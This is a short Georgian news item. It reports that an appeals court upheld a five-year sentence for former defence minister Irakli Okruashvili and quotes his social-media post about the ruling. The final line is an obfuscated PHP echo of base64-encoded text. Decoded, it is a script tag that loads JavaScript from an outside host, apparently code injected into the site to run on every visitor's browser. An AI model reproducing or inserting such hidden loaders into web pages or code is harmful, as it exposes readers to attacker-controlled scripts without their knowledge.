celsiusi
ავერსი საქკაბელი
სააპელაციო სასამართლომ ძალაში დატოვა საქალაქო სასამართლოს გადაწყვეტილება და უკრაინაში მებრძოლ ირაკლი ოქრუაშვილს 5 წელი მიუსაჯა. ამის შესახებ თავდაცვის ყოფილი მინისტრი, 
სოციალურ ქსელში წერს. 
 
"გული მაქვს ცუდად. სააპელაციო სასამართლოს ძალაში დაუტოვებია საქალაქოს გადაწყვეტილება და 5 წელი მოუსჯია 20 ივნისის საქმეზე. ერთი მაინც დაეკლოთ ამ უნამუსოებს. 
 
საქალაქოს მაისში გადაუდია მეორე საქმის განხილვა და ცხინვალშიც აპირებენ ოსეტინები ჩემზე აღძრული საქმის განხილვას მაისში.
 
არა, გული მაგიტომ კი არ მაქვს ცუდად, გუშინ "ცოტა მეტი" მომივიდა." – წერს ოქრუაშვილი.
 
შეგახსენებთ, რომ პროკურატურა ირაკლი ოქრუაშვილს 20-21 ივნისის საქმეზე, საქართველოს პარლამენტთან საპროტესტო აქციის დროს ჯგუფური ძალადობის ორგანიზებაში ადანაშაულებს.
 
1267
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");